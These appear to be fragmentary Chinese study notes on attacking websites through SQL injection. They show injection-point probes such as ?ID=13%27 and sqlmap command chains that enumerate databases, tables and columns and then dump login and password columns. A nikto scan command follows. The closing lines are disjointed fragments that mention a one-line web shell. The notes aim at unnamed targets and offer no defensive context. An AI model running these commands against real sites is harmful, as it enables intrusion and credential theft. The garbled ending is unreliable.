SQL注入,WEB扫描,寻找测试目标,注入后台
?ID=13%27 //整形数字
?ID=13 and 1-1 //页面正常显示
终端里打上:sqlmap -u 后面网址 -u//目标
--dbs --current-user //两个参数
windows 2003 //操作系统 , IIS6.0 // 服务器, ASP //外部应用,microsoft-access //数据库
sqlmap -u 网址 ?ID=13 --tables //采写表明
最大线程数提示,输入:10
查询3186选项
查找到一个表叫:news
查找表明结束,查找到:news-uname表。
sqlmap -u 网址 ?ID=13 -T //T参数 uname //自定表明 --columns //参数,uname表的列名
sqlmap -u 网址 ?ID=13 -T uname表的列名 -C //C获取数据列名 login_name.pass.username //多个列名 --dump 获取数据选项
测试数字型注入点:
网址 ?id=1%27
sqlmap -u 网址 --dbs //查看所有的数据库 --current -user
数据库
sqlmap -u 网址 --dbms mysql -D // 指定数据库名称 cmxt --tables //猜接一下段名
sqlmap -u 网址 --dbms mysql -T // 指定数据库名称 admin --columns
sqlmap -u 网址 --dbms mysql -T // 指定数据库名称 admin -C user.pwd --dump
终端输入:nikto -host //host参数 网址
尝试一下,不行换这个
有文件的索引魔板信息
CSS文件
代理服务器
删掉
2222目录
关闭
一句话木马